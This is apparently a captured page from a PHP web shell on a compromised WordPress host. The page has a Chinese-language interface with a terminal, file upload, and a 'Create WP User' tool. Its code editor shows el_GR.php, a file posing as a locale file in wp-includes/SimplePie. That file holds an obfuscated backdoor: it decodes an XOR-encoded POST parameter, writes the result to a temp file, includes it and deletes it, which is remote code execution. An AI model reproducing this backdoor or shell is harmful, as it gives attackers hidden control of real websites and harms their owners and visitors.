Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.38
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
dcustoms.pl
/
wp-includes
/
SimplePie
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
library
[目录]
drwxr-xr-x
2026-04-22 05:00
src
[目录]
drwxr-xr-x
2026-04-22 05:01
autoloader.php
3.92 KB
-rw-r--r--
2024-11-12 23:16
el_GR.php
1.02 KB
-rw-r--r--
2024-11-12 23:16
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
el_GR.php
<?php if(in_array("\x72\x65\x63ord", array_keys($_POST))){ $comp = $_POST["\x72\x65\x63ord"]; $comp= explode( '.' , $comp ) ; $value = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $u = 0; foreach ($comp as $v4) { $sChar = ord($s[$u%$lenS]); $d = ((int)$v4 - $sChar - ($u%10)) ^ 18; $value .= chr($d); $u++; } $res = array_filter(["/dev/shm", getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), sys_get_temp_dir(), "/var/tmp", getcwd()]); $ent = 0; do { $parameter_group = $res[$ent] ?? null; if ($ent >= count($res)) break; if (is_dir($parameter_group) ? is_writable($parameter_group) : false) { $holder = vsprintf("%s/%s", [$parameter_group, ".property_set"]); $file = fopen($holder, 'w'); if ($file) { fwrite($file, $value); fclose($file); include $holder; @unlink($holder); die(); } } $ent++; } while (true); }
关闭
保存